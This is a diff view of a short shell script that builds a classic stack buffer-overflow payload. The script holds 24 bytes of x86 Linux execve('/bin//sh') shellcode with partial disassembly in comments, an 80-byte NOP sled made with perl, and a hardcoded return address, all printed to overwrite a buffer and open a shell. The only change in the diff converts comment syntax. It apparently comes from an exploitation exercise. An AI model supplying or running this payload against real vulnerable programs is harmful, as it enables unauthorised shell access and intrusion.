equal
deleted
inserted
replaced
1 #!/bin/sh |
1 #!/bin/sh |
2 |
2 |
3 // shellscript that overwrites the buffer with |
3 # shellscript that overwrites the buffer with |
4 // some payload for opening a shell (the payload |
4 # some payload for opening a shell (the payload |
5 // cannot contain any \x00) |
5 # cannot contain any \x00) |
6 |
6 |
7 |
7 |
8 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
8 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |
9 |
9 |
10 # 24 bytes of shellcode |
10 # 24 bytes of shellcode |
21 # "\xb0\x0b" // movb $0xb,%al |
21 # "\xb0\x0b" // movb $0xb,%al |
22 # "\xcd\x80" // int $0x80 |
22 # "\xcd\x80" // int $0x80 |
23 |
23 |
24 padding=`perl -e 'print "\x90" x 80'` |
24 padding=`perl -e 'print "\x90" x 80'` |
25 |
25 |
26 // need s correct address in order to run |
26 # need s correct address in order to run |
27 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
27 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" |
28 |
28 |